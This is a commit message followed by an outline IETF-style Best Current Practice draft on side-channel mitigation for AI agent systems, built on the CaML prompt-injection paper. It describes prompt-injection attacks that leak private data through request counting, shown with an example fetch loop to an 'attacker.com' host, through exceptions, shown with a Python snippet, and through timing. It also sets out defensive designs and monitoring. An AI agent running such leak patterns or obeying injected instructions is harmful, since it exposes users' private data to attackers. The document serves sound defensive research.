Add full proposal system: DB schema (proposals + proposal_gaps tables), CLI `ietf intake` command, and web UI with Quick Generate on /proposals/new. The new page merges AI intake (paste URL/text → Haiku generates multiple proposals auto-linked to gaps) with manual form entry. Generated proposals are clickable cards that fill the editor below for refinement. Uses claude_model_cheap (Haiku) for cost-efficient web intake. Includes CaML-inspired draft proposals from arXiv:2503.18813 analysis. Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com>
10 KiB
title, draft_name, intended_wg, status, gaps_addressed, camel_sections, document_type, date
| title | draft_name | intended_wg | status | gaps_addressed | camel_sections | document_type | date | |||
|---|---|---|---|---|---|---|---|---|---|---|
| Side-Channel Mitigation Framework for AI Agent Interactions | draft-nennemann-ai-agent-side-channels-00 | SECDISPATCH (BCP) | outline |
|
|
BCP (Best Current Practice) | 2026-03-09 |
Side-Channel Mitigation Framework for AI Agent Interactions
1. Problem Statement
Even when AI agent systems implement strong security measures — capability-based policies, control/data flow integrity, Privileged/Quarantined execution — side-channel attacks can still leak private data. CaML (Debenedetti et al., 2025, §7) identifies three concrete side-channel attack classes against agent systems:
- External resource inference: an adversary causes the agent to make requests to an attacker-controlled server, where the number or pattern of requests leaks private information
- Exception-based bit leaking: an adversary triggers conditional exceptions that reveal one bit of private data per exception
- Timing side-channels: an adversary infers private values from execution timing differences
These are not theoretical — CaML demonstrates working exploits against Claude 3.5 Sonnet and o3-mini in their evaluation. Side-channel attacks are notoriously difficult to eliminate completely, but their impact can be reduced through careful system design.
This document is a Best Current Practice (BCP) guide for mitigating side-channel risks in AI agent systems.
2. Scope
This document provides:
- A taxonomy of side-channel risks specific to AI agent systems
- Mitigation strategies for each risk category
- Tool API design guidelines that minimize side-channel exposure
- Monitoring patterns for detecting side-channel exploitation
- STRICT vs. NORMAL mode recommendations
3. Side-Channel Taxonomy
3.1 External Resource Inference
Attack: Agent code iterates over a private value (e.g., for i in range(private_var): fetch("attacker.com/cat.jpg")). The attacker counts requests to infer the private value.
CaML context: In NORMAL mode, the loop body doesn't carry dependencies from the loop condition. In STRICT mode, fetch() inside the loop inherits the dependency on private_var and policies can block it.
Bandwidth: up to log₂(max_value) bits per interaction (or more with range-based inference).
Attacker's Server
│
│ GET /cat.jpg ×10 ← private_var = 10
│ GET /cat.jpg ×20 ← private_var = 20
│
└── attacker infers private_var by counting requests
3.2 Exception-Based Bit Leaking
Attack: The adversary prompt-injects the Processor (Q-LLM) to return an output that conditionally triggers an exception. If the exception halts execution before a state-changing tool call, the attacker observes whether the tool was called — leaking one bit.
CaML context: The Q-LLM can be influenced to return a value that causes an IndexError (e.g., returning 9999999 if a condition on private data is true, which then indexes past the end of a list).
# Attack: leak whether private_var == 10
index = query_ai_assistant(
f"If '{private_var}' is 10, return 9999999, else 0", int)
l = [1, 2, 3]
l[index] # IndexError if private_var == 10
# ADVERSARY OBSERVABLE ACTION below:
send_email(...) # only executes if no exception
Bandwidth: 1 bit per exception (was the subsequent action observed or not?).
3.3 Timing Side-Channels
Attack: Agent execution time depends on private data. For example, if time.sleep(private_var) is possible, the attacker measures response time.
CaML context: CaML's restricted Python subset doesn't include time, but other timing variations (e.g., different code paths for different private values) may still be exploitable.
Bandwidth: depends on timing precision — generally low but non-zero.
3.4 Agent-Specific Side Channels (Beyond CaML)
| Channel | Attack Vector | Bandwidth |
|---|---|---|
| Token usage | Private data influences response length → observable token count | Medium |
| Tool selection pattern | Which tools are called reveals information about private data | Medium |
| Error message content | Error details leak through supposedly sanitized channels | High |
| Model confidence | Probability distributions in structured output leak information | Low |
| Resource consumption | CPU/memory usage patterns depend on private data | Low |
4. Mitigation Strategies
4.1 STRICT Mode Execution
Recommendation: Use STRICT mode for all security-sensitive agent operations.
In STRICT mode:
- All statements inside
if/for/whileblocks inherit dependencies from the condition/iterator - This means a
fetch()insidefor i in range(private_var)will haveprivate_varin its dependency graph - Security policies can detect and block the side-channel
Trade-off: STRICT mode reduces utility. CaML shows policy triggering rates increase from 33.87% (NORMAL) to 53.23% (STRICT) in benign scenarios. Recommendation: use STRICT mode by default, allow NORMAL mode only for explicitly low-sensitivity operations.
4.2 Exception Handling Hardening
Recommendation: Use error-value types instead of exceptions for data-dependent operations.
Exceptions create side channels because they halt execution. Instead:
# VULNERABLE: exception leaks information
try:
result = risky_operation(private_data)
send_email(result) # not reached if exception
except:
pass # attacker observes: was email sent?
# MITIGATED: error-value preserves execution flow
result = risky_operation(private_data) # returns Result type
if result.is_ok():
send_email(result.value) # both branches execute deterministically
else:
send_email(default_value) # same tool call either way
Agent frameworks SHOULD:
- Use
Result/Eithertypes instead of exceptions for Processor outputs - Ensure both success and failure paths make the same external observations
- Redact exception messages before they reach the Planner
4.3 Constant-Pattern Tool Calls
Recommendation: Where feasible, make tool call patterns independent of private data.
- Avoid data-dependent loops that make external calls
- Use batch operations instead of per-item calls
- Pad tool call sequences to fixed lengths for sensitive operations
4.4 External Request Restrictions
Recommendation: Restrict which external endpoints agents can contact.
- Allowlist approved external domains
- Proxy all external requests through a controlled gateway
- Rate-limit external requests per agent session
- Log all external requests for anomaly detection
5. Tool API Design Guidelines
Tool developers SHOULD design APIs that minimize side-channel exposure:
5.1 Do
- Return consistent response structures regardless of input
- Use fixed-size responses where possible
- Include provenance metadata in all outputs
- Document trust levels of output fields (which are public, which are private)
5.2 Don't
- Return variable-length arrays that depend on private data in observable ways
- Include internal identifiers in error messages
- Use response timing that depends on input sensitivity
- Expose iteration counts or batch sizes in responses
5.3 Tool Capability Annotations
Tools SHOULD declare their side-channel properties:
{
"tool:name": "send_email",
"tool:side_channel_properties": {
"makes_external_requests": true,
"timing_dependent": false,
"error_messages_may_leak": true,
"observable_by_third_parties": true
},
"tool:recommended_mode": "STRICT"
}
6. Monitoring Patterns
6.1 Anomaly Detection Signals
| Signal | Potential Attack | Action |
|---|---|---|
| Repeated requests to same external URL | External resource inference | Rate limit + alert |
| Unusually high exception rate | Exception-based bit leaking | Halt + review |
| Execution time variance > threshold | Timing side-channel | Log + investigate |
| Tool call patterns differ from plan | Control flow manipulation | Emergency halt |
| Same agent repeatedly hitting policy denials | Probing attack | Throttle + alert |
6.2 Monitoring Architecture
Agent Execution
│
├──► Side-Channel Monitor
│ ├── Request pattern analyzer
│ ├── Exception rate tracker
│ ├── Timing variance detector
│ └── Tool call pattern validator
│ │
│ ▼
│ Alert / Halt Decision
│
▼
Normal execution continues (if no anomaly)
7. Relationship to Other Drafts
| Draft | Side-Channel Relevance |
|---|---|
| Draft 1 (Capabilities) | Capability metadata enables policy checks that detect side channels |
| Draft 2 (Flow Integrity) | STRICT mode DFG tracking is the primary side-channel mitigation |
| Draft 3 (Provenance) | Provenance metadata itself can be a side channel — needs protection |
| Draft 4 (Policy Federation) | Policy denial patterns across organizations can leak info |
| Draft 5 (Execution Model) | Isolation architecture is the first line of defense |
8. Security Considerations
This entire document is about security. Key meta-considerations:
- Side-channel mitigation is defense in depth — no single measure eliminates all channels
- The trade-off between security and utility is fundamental — complete side-channel elimination would make agents unusable
- New side channels will be discovered as agent systems evolve — this BCP should be updated regularly
- Side-channel monitoring itself can create privacy issues (logging all agent interactions)
9. Open Questions
- Formal analysis: can we formally prove bounds on information leakage for a given agent configuration?
- Adaptive adversaries: as mitigations are deployed, attackers will find new channels. How to stay ahead?
- Overhead budget: what is the acceptable performance overhead for side-channel mitigation?
- Multi-agent amplification: do side channels in multi-agent systems compose (leak more than single-agent)?
10. References
- Debenedetti et al. "Defeating Prompt Injections by Design." arXiv:2503.18813, 2025.
- Anderson, Stajano, Lee. "Security policies." Advances in Computers, 2002.
- Glukhov et al. "Breach By A Thousand Leaks: Unsafe Information Leakage in 'Safe' AI Responses." ICLR, 2025.
- Carlini & Wagner. "ROP is still dangerous: Breaking modern defenses." USENIX Security 14, 2014.